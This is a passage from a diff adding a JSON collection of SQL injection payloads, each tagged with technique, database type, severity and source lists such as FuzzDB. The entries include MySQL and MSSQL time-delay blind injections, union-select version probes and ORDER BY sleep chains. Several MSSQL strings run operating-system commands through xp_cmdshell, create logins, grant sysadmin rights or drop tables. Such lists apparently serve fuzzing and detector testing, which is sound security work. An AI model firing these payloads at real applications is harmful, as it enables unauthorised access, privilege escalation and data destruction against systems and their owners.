"payload": "\")))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\")))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\")))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "'; exec master..xp_cmdshell 'ping 10.10.1.2'--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "'create user name identified by 'pass123' --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "'create user name identified by pass123 temporary tablespace temp default tablespace users;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' ; drop table temp --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "'exec sp_addlogin 'name' , 'password' --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' exec sp_addsrvrolemember 'name' , 'sysadmin' --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' grant connect to name; grant resource to name; --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' or 1=1 --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mssql", + "severity": "high", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select @@version) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select NULL, (select @@version)) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select NULL, NULL, (select @@version)) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select NULL, NULL, NULL, (select @@version)) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select NULL, NULL, NULL, NULL, (select @@version)) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": "' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL" + } + }, + { + "payload": ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "\"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-ORDER_BY" + } + }, + { + "payload": "waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "' waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "' waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\" waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\" waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ") waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ") waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ")) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ")) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ")))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ")))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": ")))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "') waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "') waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\") waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\") waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "'))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "'))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\"))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\"))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "'))))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "'))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\"))))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\"))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')))))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "')))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")))))) waitfor delay '0:0:20' /*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "\")))))) waitfor delay '0:0:20' --", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mssql", + "severity": "medium", + "source": "payloads-sql-blind-MSSQL-WHERE" + } + }, + { + "payload": "SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "SQLi_Polyglots" + } + }, + { + "payload": "SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR\"*/ FROM some_table WHERE ex = ample", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "SQLi_Polyglots" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5)", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5)#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),3#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),3,4#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#", + "category": "sqli", + "metadata": { + "type": "time_based", + "technique": "time_delay", + "dbms": 